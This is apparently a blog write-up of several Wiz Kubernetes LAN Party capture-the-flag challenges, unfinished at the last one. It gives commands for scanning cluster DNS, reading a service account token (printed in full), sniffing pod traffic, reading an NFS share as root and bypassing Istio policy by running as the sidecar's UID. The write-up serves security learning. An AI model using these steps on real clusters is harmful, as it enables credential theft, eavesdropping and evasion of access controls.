Kubernetes CTF- WIZ K8s LAN Party

n00🔑
6 min readAug 20, 2024

--

Challenge: Recon

Statement-

DNSing with the stars
You have shell access to compromised a Kubernetes pod at the bottom of this page, and your next objective is to compromise other internal services further.

As a warmup, utilize DNS scanning to uncover hidden internal services and obtain the flag. We have “loaded your machine with dnscan to ease this process for further challenges.

All the flags in the challenge follow the same format: wiz_k8s_lan_party{*}

Checking current permissions-

 kubectl auth can-i --list

Environment variables-

Found subdomains in .kube folder-

acme.cert-manager.io
admissionregistration.k8s.io
apiextensions.k8s.io
apiregistration.k8s.io
authentication.k8s.io
authorization.k8s.io
cert-manager.io
certificates.k8s.io
coordination.k8s.io
crd.k8s.amazonaws.com
discovery.k8s.io
elbv2.k8s.aws
events.k8s.io
extensions.istio.io
flowcontrol.apiserver.k8s.io
install.istio.io
kyverno.io
networking.istio.io
networking.k8s.aws
networking.k8s.io
node.k8s.io
rbac.authorization.k8s.io
scheduling.k8s.io
security.istio.io
servergroups.json
storage.k8s.io
telemetry.istio.io
vpcresources.k8s.aws
wgpolicyk8s.io

Found Istio user in Linpeas output-

ISTIO

Kubernetes access token-

By default, service account tokens are mounted in a pod at the following location

/var/run/secrets/kubernetes.io/serviceaccount

namespace- k8s-lan-party

token-

eyJhbGciOiJSUzI1NiIsImtpZCI6IjM3NTcyZTczM2RmZjExYmUyNzIwOTgzNzBhMjgyOGE5MThiNGVmNjYifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjIl0sImV4cCI6MTc1NTE3NTE2NSwiaWF0IjoxNzIzNjM5MTY1LCJpc3MiOiJodHRwczovL29pZGMuZWtzLnVzLXdlc3QtMS5hbWF6b25hd3MuY29tL2lkL0MwNjJDMjA3QzhGNTBERTRFQzI0QTM3MkZGNjBFNTg5Iiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJrOHMtbGFuLXBhcnR5IiwicG9kIjp7Im5hbWUiOiJhdHRhY2tlci1kZXBsb3ltZW50LTc2ZDg1OTA3LTZjODRjNDk0Nzkta2hwY3giLCJ1aWQiOiI2ZjQwZjJjMC1hYzFhLTQ1ZGEtOTVhNy05OGI5MDQyZTZmODAifSwic2VydmljZWFjY291bnQiOnsibmFtZSI6ImRlZmF1bHQiLCJ1aWQiOiIxODc3ZTQyZC1hNWUxLTQ2NTctYjc2NC05YTMxMTA5ZWQwNjEifSwid2FybmFmdGVyIjoxNzIzNjQyNzcyfSwibmJmIjoxNzIzNjM5MTY1LCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6azhzLWxhbi1wYXJ0eTpkZWZhdWx0In0.GbDXYHusTMU_ZnEq9Q5xQn84rlIGNIKrPPSTDLm6RG1j2pwPTTEsxiSe9Y8fdH_UX2nWwwRmHmbaaqW-DqlvNOIEVAg3aZ6gWjrBXXcVmiAvmtBBxJv9ExvET-VbRNwhfbr9w84JiUJAUjV6G__KuC0Ob4kEkoHVKtNDgD7qK0m2t8DPpmexqgN9IecOAI94zBJRnZQkMXSch3-2opyqfelQGvrx6kf12aha8Q7QfJZjVOTvBrEaInocOeDxE9YBFzR1VLgRN06GPEkcwKTX6X51vibMTeLzudSojAgyuJVF9M5Bvl_xWh-6TayJd_jSlnEdOjQoRV1x7VnHGtaaQw

DNS server-

/etc/resolv.conf
nameserver: 10.100.120.34
  • The search directive specifies a list of domain suffixes that will be automatically appended to DNS queries when a hostname is not fully qualified (i.e., it doesn't have a dot in it).
  • The search domains are tried in order until a match is found.
  • For example, if you try to resolve the hostname webserver, the system will try the following:
  • webserver.k8s-lan-party.svc.cluster.local
  • webserver.svc.cluster.local
  • webserver.cluster.local
  • webserver.us-west-1.compute.internal

This is particularly useful in environments like Kubernetes, where services within the cluster might be resolved using shorter names.

Running reverse DNS lookup on the-

seq 0 255 | xargs -P 50 -I {} bash -c 'for j in {0..255}; do dig -x 10.100.{}.$j +short | grep . && echo "10.100.{}.${j}"; done'
OR
dnscan -subnet 10.100.0.1/16
https://gist.github.com/nirohfeld/c596898673ead369cb8992d97a1c764e

Challenge: Finding Neighbours

Hello?
Sometimes, it seems we are the only ones around, but we should always be on guard against invisible sidecars reporting sensitive secrets.

https://kubernetes.io/docs/concepts/workloads/pods/sidecar-containers/

Using linpeas.sh for enumeration.

#Transfer linpeas to the container and add execute permissions to the binary
./linpeas.sh | tee linpeas.out

In linpeas output, We found that our current container has interesting capabilities(Group of system calls)-

cap_net_admin and cap_net_raw
cat /proc/1/status | grep -i 'CapEff'

#0000000000003000
capsh --decode=0000000000003000
Manually checking capabilities

quick search over AI about these capabilities.

bing copilot

Checking if any network sniffing tools exist and we found it @ /usr/local/bin/tcpdump

Capturing network traffic -

tcpdump -i <interface> -w <output.pcap>
OR
tcpdump -v

Transferred this pcap to local system and upon analyzing pcap we get the flag.

https://apackets.com/

Based upon the HTTP response, we can see istio is being used in the cluster.

Challenge: Data Leakage- Exposed File Share

The targeted big corp utilizes outdated, yet cloud-supported technology for data storage in production. But oh my, this technology was introduced in an era when access control was only network-based 🤦‍️.

Again going through the linpeas output-

/efs is non default directory which exists in the container.

Checking mounts /proc/mounts

Found flag .txt in /efs share but didn’t had permissions to read it.

No permissions

Let us try to remount the share on other directory.

mount has suid bit set

I was unable to mount this share. Then took hint from the challenge.

Got to know about nfs-ls and nfs-cat

nfs-ls nfs://192.168.124.98/?version=4&uid=0&gid=0
nfs-cat 'nfs://192.168.124.98//flag.txt?version=4&uid=0&gid=0'

And after solving 3 challenges I got a certificate

https://k8slanparty.com/certificate/Vxk8520Y

Challenge: The Beauty and The Ist

Apparently, new service mesh technologies hold unique appeal for ultra-elite users (root users). Don’t abuse this power; use it responsibly and with caution.

We have been provided with a policy-

apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
name: istio-get-flag
namespace: k8s-lan-party
spec:
action: DENY
selector:
matchLabels:
app: "{flag-pod-name}"
rules:
- from:
- source:
namespaces: ["k8s-lan-party"]
to:
- operation:
methods: ["POST", "GET"]
10.100.0.1

Running reverse DNS lookup again-

seq 0 255 | xargs -P 50 -I {} bash -c 'for j in {0..255}; do dig -x 10.100.{}.$j +short | grep . && echo "10.100.{}.${j}"; done'
OR
dnscan -subnet 10.100.0.1/16
istio-protected-pod-service.k8s-lan-party.svc.cluster.local. → 10.100.224.159
dnscan

Istio is an open-source service mesh that helps manage communication, security, and observability in microservices architectures. It provides a way to control how different parts of an application share data with one another

Learning more about ISTIO -

https://www.youtube.com/watch?v=16fgzklcF7Y

https://www.aquasec.com/blog/istio-kubernetes-security-zero-trust-networking/

Security Issues in ISTIO -

Envoy runs as user with UID 1337. The iptables direct all the traffic in the pod to the envoy, except for the traffic of the user with UID 1337. Therefore, in order to circumvent the envoy’s control on the outbound traffic, e.g. to prevent logging and monitoring of the outbound requests, the attacker can perform requests from user with uid 1337.

https://github.com/istio/istio/issues/4286

sudo -u istio curl istio-protected-pod-service.k8s-lan-party.svc.cluster.local

Challenge: Who will guard the guardians?

Where pods are being mutated by a foreign regime, one could abuse its bureaucracy and leak sensitive information from the administrative services.

Policy-

apiVersion: kyverno.io/v1
kind: Policy
metadata:
name: apply-flag-to-env
namespace: sensitive-ns
spec:
rules:
- name: inject-env-vars
match:
resources:
kinds:
- Pod
mutate:
patchStrategicMerge:
spec:
containers:
- name: "*"
env:
- name: FLAG
value: "{flag}"
10.100.86.210 -> kyverno-cleanup-controller.kyverno.svc.cluster.local.
10.100.126.98 -> kyverno-svc-metrics.kyverno.svc.cluster.local.
10.100.158.213 -> kyverno-reports-controller-metrics.kyverno.svc.cluster.local.
10.100.171.174 -> kyverno-background-controller-metrics.kyverno.svc.cluster.local.
10.100.217.223 -> kyverno-cleanup-controller-metrics.kyverno.svc.cluster.local.
10.100.232.19 -> kyverno-svc.kyverno.svc.cluster.local.

I am unable to solve after this for now.

--

--

n00🔑
n00🔑

Written by n00🔑

Computer Security Enthusiast. Usually plays HTB (ID-23862). https://www.youtube.com/@pswalia2u https://www.linkedin.com/in/pswalia2u/ Instagram @pswalia4u

No responses yet